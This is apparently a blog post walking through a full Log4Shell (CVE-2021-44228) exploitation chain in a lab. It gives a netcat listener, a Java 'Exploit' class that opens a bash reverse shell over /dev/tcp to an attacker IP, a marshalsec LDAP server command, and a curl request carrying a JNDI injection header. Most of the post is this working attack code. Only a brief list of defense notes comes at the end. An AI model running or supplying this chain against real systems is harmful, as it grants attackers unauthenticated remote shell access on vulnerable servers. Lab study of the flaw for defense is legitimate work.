Achieving a Reverse Shell via Log4Shell: Controlled Exploitation Walkthrough
#log4shell
CRUD5th-273-

CRUD5th-273- @crud5th-273-

Joined:
Mar 4, 2025

Achieving a Reverse Shell via Log4Shell: Controlled Exploitation Walkthrough

Publish Date: Mar 30
0 0

Log4Shell (CVE-2021-44228) is notorious for its ability to enable unauthenticated remote code execution (RCE) — but more critically, it allows full reverse shell control when weaponized properly.

In this article, we’ll reproduce a complete Log4Shell-to-shell chain using a safe local lab.

Lab Objective

Trigger a reverse shell from a vulnerable Log4j instance to an attacker-controlled machine via JNDI LDAP exploitation.

Lab Setup:

  • Vulnerable Java app (Log4j ≤ 2.14.1)
  • Malicious LDAP server (marshalsec)
  • Attacker listener (netcat)

1. Prepare the Listener

Start a reverse shell listener on your attacking machine:

nc -lvnp 4444
Enter fullscreen mode Exit fullscreen mode

2. Create Exploit Class (Reverse Shell Payload)

Write a Java payload that connects back to the listener:

import java.io.IOException;
public class Exploit {
    static {
        try {
            String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1"};
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Enter fullscreen mode Exit fullscreen mode

Compile and serve via HTTP:

javac Exploit.java
python3 -m http.server 8000
Enter fullscreen mode Exit fullscreen mode

3. Run Malicious LDAP Server

Serve the class reference via marshalsec:

java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer \
  "http://<attacker-ip>:8000/#Exploit"
Enter fullscreen mode Exit fullscreen mode

4. Trigger the Exploit

Send the crafted payload to the vulnerable Log4j endpoint:

curl http://<target-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<attacker-ip>:1389/Exploit}'
Enter fullscreen mode Exit fullscreen mode

5. Confirm Reverse Shell

If successful, the listener should receive a connection:

whoami
hostname
Enter fullscreen mode Exit fullscreen mode

6. Defense Notes

  • Restrict outbound traffic (egress filtering)
  • Disable JNDI lookups entirely (-Dlog4j2.formatMsgNoLookups=true)
  • Use JVM SecurityManager or sandboxing
  • Monitor for suspicious DNS/LDAP outbound patterns

Final Thoughts

This lab demonstrates how a seemingly benign logging library can become a full-fledged entrypoint for remote shell access.

Mastering the end-to-end chain — from vector to payload delivery to shell — is essential for both offensive research and hardened defense.

Next: we’ll capture this exploit in real-time using tcpdump and correlate it with JVM behavior for deep forensic insights.

Comments 0 total

    Add comment